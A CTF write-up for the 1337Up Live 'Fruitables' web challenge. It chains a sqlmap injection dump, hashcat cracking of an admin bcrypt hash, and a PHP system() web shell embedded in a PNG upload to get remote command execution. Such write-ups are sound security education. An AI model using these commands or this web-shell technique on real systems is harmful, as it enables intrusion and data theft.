Post

1337Up Live CTF web/Fruitables

My solution for 1337Up Live CTF web/Fruitables challenge

Posted
By null_byte
1 min read

Challenge overview

Fruitables

The Fruitables challenge presents a web application for managing fruit-related content. The application includes user authentication, an admin panel, and file upload functionality. The goal is to identify and exploit multiple vulnerabilities to ultimately retrieve a hidden flag file.

Initial reconnaissance

During the initial enumeration phase, I discovered the main application with an interesting endpoint at /account.php. This suggested potential authentication vectors worth investigating.

Analysis

SQL Injection

The registration endpoint was found to be vulnerable to SQL injection. Using sqlmap, I exploited this vulnerability to dump the database contents:

1
2
3
4

sqlmap -u "https://fruitables-0.ctf.intigriti.io/auth/fruitables_register.php" \
--data="first_name=a&last_name=a&username=a&password=a" \
--method POST \
--dump -p username

The scan revealed a users table containing valuable information: Fruitables Hashes

Password cracking

Using hashcat, I successfully cracked the administrator’s password hash, revealing the password: futurama

1

hashcat -m 3200 -a 0 '$2y$10$ukfji0VE/xBEBuwDFp/5b.fy6EjZ2VtaK6Xj0Wdip/viPEnVFqGGa' rockyou.txt

File upload vulnerability

After gaining administrative access, I discovered a file upload feature that accepted image files (JPEG/PNG). Through testing, I identified that:

  1. The uploads were accessible via the /uploads/ directory
  2. The application performed insufficient validation on file contents
  3. PNG metadata was not properly sanitized

Exploitation

  1. Administrative access
    • Used SQL injection to dump user database
    • Cracked admin password hash
    • Logged in as administrator using tjfry_admin:futurama
  2. File upload
    • Created a malicious PNG file with embedded PHP code:
      1

      <?php system($_GET["cmd"]); ?>
    • Embedded the code in the PNG IHDR chunk while maintaining valid PNG structure
    • Successfully uploaded the file through the admin panel Fruitables Burp
  3. Remote Code Execution (RCE)
    • Located uploaded file in /uploads/ directory
    • Executed commands using the cmd GET parameter
    • Retrieved flag from /flag_poxm7AQwN77Lj2PU.txt Fruitables Flag

Flag:
INTIGRITI{fru174bl35_vuln3r4b1l17y_ch3ckm8}

Conclusion

The Fruitables challenge demonstrated the importance of implementing proper security controls across multiple application components.

Key takeaways

  1. Always implement proper input validation and sanitization.
  2. Use strong password hashing algorithms and enforce robust password policies.
  3. Implement thorough file upload validation, including content inspection.
CTF, 1337Up
ctf writeup 1337up
This post is licensed under CC BY 4.0 by the author.